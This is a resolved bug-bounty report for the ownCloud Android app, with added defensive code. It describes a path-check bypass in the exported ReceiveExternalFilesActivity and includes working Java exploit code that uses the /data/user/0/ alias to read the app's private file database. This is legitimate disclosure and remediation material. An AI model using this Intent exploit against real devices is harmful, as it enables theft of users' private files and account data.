Possible to steal any protected files on Android

Medium
ownCloud
Submitted None
Reported by shell_c0de

Vulnerability Details

Technical details and impact analysis

Information Disclosure
Hi. I have found an issue which allows retrieving any files from the `/data/data/com.owncloud.android/*` directory. The problem is in the exported activity `com.owncloud.android.ui.activity.ReceiveExternalFilesActivity`, which accepts a URI to download files. I see that you've added verification of the path `/data/data/`. You can bypass the verification by specifying an alternative path: `/data/user/0/com.owncloud.android/`

Malicious code:

```java
StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
StrictMode.setVmPolicy(builder.build());
Intent intent = new Intent("android.intent.action.SEND");
intent.setClassName("com.owncloud.android", "com.owncloud.android.ui.activity.ReceiveExternalFilesActivity");
intent.setType("*/*");
intent.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.putExtra("android.intent.extra.STREAM", Uri.parse("file:///data/user/0/com.owncloud.android/databases/filelist"));
startActivity(intent);
```

### How to Fix

Add an alternative path to the folder check

## Impact

This vulnerability can get a complete account; malware can access everything, including the file database and history.
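The report's suggested fix adds one more path to the folder check. The added example below, which is not part of the report or of ownCloud's code, contrasts a string-prefix check with a comparison of canonical paths, so that every alias of the private directory is rejected by one rule. The class and method names are hypothetical, and the temporary directory tree, with `user/0` modelled as a symlink to `data/data`, is constructed for the demonstration and assumes a POSIX filesystem.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Added example: hypothetical names, constructed directory layout.
public class PrivatePathCheck {

    // String-prefix check: blocks only one spelling of the private directory.
    static boolean naiveIsPrivate(String path, String blockedPrefix) {
        return path.startsWith(blockedPrefix);
    }

    // Resolve symlinks on both sides, then compare whole path components.
    static boolean canonicalIsPrivate(File candidate, File privateDir) throws IOException {
        Path target = candidate.getCanonicalFile().toPath();
        Path root = privateDir.getCanonicalFile().toPath();
        return target.startsWith(root);
    }

    public static void main(String[] args) throws IOException {
        // Constructed stand-in for the device layout:
        //   <tmp>/data/data/com.owncloud.android   real directory
        //   <tmp>/data/user/0                      symlink to <tmp>/data/data
        Path tmp = Files.createTempDirectory("layout");
        Path db = Files.createDirectories(
                tmp.resolve("data/data/com.owncloud.android/databases"));
        Files.createFile(db.resolve("filelist"));
        Files.createDirectories(tmp.resolve("data/user"));
        Files.createSymbolicLink(tmp.resolve("data/user/0"), tmp.resolve("data/data"));

        File privateDir = tmp.resolve("data/data/com.owncloud.android").toFile();
        String[] inputs = {
            "data/data/com.owncloud.android/databases/filelist",   // direct path
            "data/user/0/com.owncloud.android/databases/filelist", // alias from the report
        };
        for (String rel : inputs) {
            File f = tmp.resolve(rel).toFile();
            boolean naive = naiveIsPrivate(f.getPath(), privateDir.getPath());
            boolean canon = canonicalIsPrivate(f, privateDir);
            System.out.printf("%-55s naive=%-5b canonical=%b%n", rel, naive, canon);
        }
    }
}
```

In an Android app the `privateDir` argument would be the app's own data directory, for example `getApplicationInfo().dataDir`, rather than a hard-coded string.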

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$750.00

Submitted

Weakness

Information Disclosure